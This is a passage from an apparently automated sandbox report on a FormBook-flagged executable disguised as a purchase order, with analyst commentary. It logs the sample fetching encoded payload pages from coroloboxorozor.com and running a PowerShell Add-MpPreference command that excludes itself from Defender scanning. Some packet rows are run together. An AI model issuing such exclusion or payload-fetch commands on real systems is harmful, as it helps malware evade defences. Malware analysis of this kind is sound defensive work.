                  RT_ICON | 0x9c0e8 | 0x1d9d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
                  RT_GROUP_ICON | 0x9de88 | 0x14 | data | |
                  RT_VERSION | 0x9de9c | 0x388 | data | English | United States
                  The 7.57 entropy of .rsrc comes from this 7581-byte PNG icon (deflate-compressed data inside an 8740-byte section), not from packed code; the .text section's entropy of 4.34 is ordinary for .NET IL. The icon is also the one the "Icon mismatch" signature refers to: a stock icon borrowed from a legitimate application to make the file look like a document.

                  Imports

                  DLL | Import
                  mscoree.dll | _CorExeMain

                  Version Infos

                  Description | Data
                  LegalCopyright | Copyright 2022 OionjRgH. All rights reserved.
                  Assembly Version | 4.3.3.8
                  InternalName | BPxnwGrR.exe
                  FileVersion | 0.2.2.0
                  CompanyName | AxOIZuyu
                  LegalTrademarks | ZMjlXTgt
                  Comments | OxipRjZc
                  ProductName | BPxnwGrR
                  ProductVersion | 4.3.3.8
                  FileDescription | JMUBrPvp
                  OriginalFilename | BPxnwGrR.exe
                  Translation | 0x0409 0x0514
                  Every string field is an eight-character pseudo-random identifier and the copyright year (2022) postdates the analysis date (February 2021), which is consistent with a version resource generated by a crypter rather than copied from a real product. The InternalName/OriginalFilename BPxnwGrR.exe also differs from the submitted name, so the purchase-order filename was chosen for the lure, not by the build.

                  Possible Origin

                  Language of compilation system | Country where language is spoken
                  English | United States

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  The packets shown are one plain-HTTP session (client port 49711 to port 80) with 104.21.71.230, one of the two Cloudflare addresses listed for coroloboxorozor.com in the domain context above; no TLS is involved, which is also why the JA3 section has no context.
                  Feb 23, 2021 09:36:42.135297060 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.198645115 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.199220896 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.200351954 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.262064934 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.408135891 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.408164024 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.408176899 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.408193111 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.408209085 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.408225060 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.408240080 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.408242941 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.408256054 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.408272982 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.408284903 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.408288956 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.408313036 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.408504009 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.409522057 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.409549952 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.409610033 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.411025047 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.411051035 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.411942959 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.412453890 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.412482023 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.412822962 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.413923979 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.413949966 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.414257050 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.415360928 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.415391922 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.415441036 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.416832924 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.416862965 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.417001963 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.418287039 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.418315887 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.418533087 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.419714928 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.419743061 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.419855118 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.421175003 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.421195030 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.421413898 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.422626019 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.422643900 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.422727108 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.469978094 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.469999075 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.470227957 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.470690012 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.470709085 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.470968008 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.472170115 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.472188950 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.472464085 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.473584890 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.473611116 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.473675966 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.475032091 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.475790977 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.475810051 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.475897074 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.477252007 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.477269888 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.477327108 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.478729963 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.478748083 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.479207993 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.480191946 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.480211973 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.481112003 CET | 49711 | 80 | 192.168.2.3 | 104.21.71.230
                  Feb 23, 2021 09:36:42.481628895 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.481650114 CET | 80 | 49711 | 104.21.71.230 | 192.168.2.3
                  Feb 23, 2021 09:36:42.482146025 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.483097076 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.483114958 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.483144999 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.484570980 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.484589100 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.484688997 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.485992908 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.486015081 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.486053944 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.487451077 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.487468958 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.487552881 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.488914967 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.488933086 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.489018917 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.490354061 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.490370989 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.490664005 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.491861105 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.491935968 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.492515087 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.492533922 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.492616892 CET4971180192.168.2.3104.21.71.230

                  UDP Packets


                  DNS Queries

                  Timestamp: Feb 23, 2021 09:36:42.053989887 CET
                  Source IP: 192.168.2.3
                  Dest IP: 8.8.8.8
                  Trans ID: 0xa5c2
                  OP Code: Standard query (0)
                  Name: coroloboxorozor.com
                  Type: A (IP address)
                  Class: IN (0x0001)

                  DNS Answers

                  Timestamp: Feb 23, 2021 09:36:42.114923954 CET
                  Source IP: 8.8.8.8
                  Dest IP: 192.168.2.3
                  Trans ID: 0xa5c2
                  Reply Code: No error (0)
                  Name: coroloboxorozor.com
                  CName:
                  Address: 104.21.71.230
                  Type: A (IP address)
                  Class: IN (0x0001)

                  Timestamp: Feb 23, 2021 09:36:42.114923954 CET
                  Source IP: 8.8.8.8
                  Dest IP: 192.168.2.3
                  Trans ID: 0xa5c2
                  Reply Code: No error (0)
                  Name: coroloboxorozor.com
                  CName:
                  Address: 172.67.172.17
                  Type: A (IP address)
                  Class: IN (0x0001)

                  HTTP Request Dependency Graph

                  • coroloboxorozor.com

                  HTTP Packets

                  Session ID: 0
                  Source IP: 192.168.2.3
                  Source Port: 49711
                  Destination IP: 104.21.71.230
                  Destination Port: 80
                  Process: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe

                  Timestamp: Feb 23, 2021 09:36:42.200351954 CET
                  kBytes transferred: 1298
                  Direction: OUT
                  Data: GET /base/23DEF5FFA542BB2D1BCA37F7C5ECC686.html HTTP/1.1
                  Host: coroloboxorozor.com
                  Connection: Keep-Alive
                  Timestamp: Feb 23, 2021 09:36:42.408135891 CET
                  kBytes transferred: 1301
                  Direction: IN
                  Data: HTTP/1.1 200 OK
                  Date: Tue, 23 Feb 2021 08:36:42 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Set-Cookie: __cfduid=d3a4c8ac3a1b0db931a12a2c20754fb861614069402; expires=Thu, 25-Mar-21 08:36:42 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                  Last-Modified: Tue, 23 Feb 2021 03:54:31 GMT
                  Vary: Accept-Encoding
                  X-Frame-Options: SAMEORIGIN
                  CF-Cache-Status: DYNAMIC
                  cf-request-id: 086fa1a27d00000b3311053000000001
                  Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=jVWNzufHJ99cmcidvUdRbHWrvgXaEbsypuAxkFtuyOZKg9wGVQU4YEGodATHy1zDzg4ID6Hua2NL75Q6uNlIzOOVsFWaB7CjL71h3H%2BpuoMmllOv"}],"max_age":604800}
                  NEL: {"max_age":604800,"report_to":"cf-nel"}
                  Server: cloudflare
                  CF-RAY: 625f9ee3ffb70b33-AMS
                  Data Ascii: 7c99<p>GGerueclleuePeueueueleueueueiMMeiMMeueuecIleueueueueueueueLleueueueueueueueueueueueueueueueueueueueueueueueueueueueueueueueueueueueciIeueueueclePcecILecleuecIuereiuMePPecIleceGLeiuMePPeIleculecuMeccMePiecciecclecccecuPecclerGecurePierrerGeccueccueccceccLePierIecucePieccleccGeccuePiecuMeccuePieLIeGreIPePiecurecccecuuecucelLecPecPecuePLeueueueueueueueIueLreueueGLecePeueGLeclielcecIueueueueueueueueueiileuePleuecceceIueueuecLLereueueLeueueueueueueiPIecrGereueuePieueueueiilereueueueueciIeuePieueueueieueueleueueueueueueueleueueueueueue
                  Timestamp: Feb 23, 2021 09:36:43.711971998 CET
                  kBytes transferred: 2376
                  Direction: OUT
                  Data: GET /base/C02C82A7124B198823DC14A0727ADA5A.html HTTP/1.1
                  Host: coroloboxorozor.com
                  Timestamp: Feb 23, 2021 09:36:43.877722025 CET
                  kBytes transferred: 2377
                  Direction: IN
                  Data: HTTP/1.1 200 OK
                  Date: Tue, 23 Feb 2021 08:36:43 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Set-Cookie: __cfduid=ded8d61f3eec628b094e1c0e3966a84701614069403; expires=Thu, 25-Mar-21 08:36:43 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                  Last-Modified: Tue, 23 Feb 2021 03:54:37 GMT
                  Vary: Accept-Encoding
                  X-Frame-Options: SAMEORIGIN
                  CF-Cache-Status: DYNAMIC
                  cf-request-id: 086fa1a86600000b33e9b57000000001
                  Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=qKDvTIzo9BXuxDd9D5JkYhc4B5tIRkHu3f8kN4P2VTOnLxBlP77yt7BXIMXnLnWZEGt9Jo7Vy0FMaRVaI5ZXgN%2F6ncvgzWYn1v4ZWFaWLoo2t7HX"}],"max_age":604800}
                  NEL: {"max_age":604800,"report_to":"cf-nel"}
                  Server: cloudflare
                  CF-RAY: 625f9eed7efc0b33-AMS
                  Data Ascii: 7c99<p>cLceiPleiMcecLLecirecMGePIecMrecuPeiPceiLeLMerGeGIelLeilierGeiiGeiPcerleLPellerLecIcecGreGPecueGielecGeGrerMeiPceIcecuGeiuGeIIeiceicrecIeGceLleiiPecIiecMiecLcecIPecLLecIrecluecuceiPuecrGecLMeciGeMGeLlecPIeillecMleiuMeGcePieiMecrIecPiePMecLrerLecMecMrelMerLeilreMreiGeLreMceiureMLeclLecLGeMLeilrecPlecMueriecIieGGeMreiMueiPIeciGecleilPercerlelLecGIerGeMPeGLecrPeiPeLMecGMeMleiMiecGlecPMecLiecIierMePMeculePMeiPceGLeilleiuiecuelGeicMecPleLeiiueclGeccIecIrecPlecPLeGIeilrecPLeIrePIeiiMelPeiiceiiLecrLeicGecurelMecLcerlecuPecuPeMGecleGIeii


                  Behavior

                  System Behavior

                  General

                  Start time:09:36:38
                  Start date:23/02/2021
                  Path:C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe'
                  Imagebase:0xb50000
                  File size:639488 bytes
                  MD5 hash:9D8635210670E8B332120A969DFA269E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  General

                  Start time:09:36:53
                  Start date:23/02/2021
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe' -Force
                  Imagebase:0xa70000
                  File size:430592 bytes
                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:high

                  General

                  Start time:09:36:53
                  Start date:23/02/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6b2800000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:09:36:55
                  Start date:23/02/2021
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                  Imagebase:0xbd0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:09:36:56
                  Start date:23/02/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6b2800000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:09:36:56
                  Start date:23/02/2021
                  Path:C:\Windows\SysWOW64\timeout.exe
                  Wow64 process (32bit):true
                  Commandline:timeout 1
                  Imagebase:0x12f0000
                  File size:26112 bytes
                  MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:09:37:03
                  Start date:23/02/2021
                  Path:C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe
                  Imagebase:0xce0000
                  File size:639488 bytes
                  MD5 hash:9D8635210670E8B332120A969DFA269E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  General

                  Start time:09:37:05
                  Start date:23/02/2021
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6392 -s 964
                  Imagebase:0x7ff6b2800000
                  File size:434592 bytes
                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:high
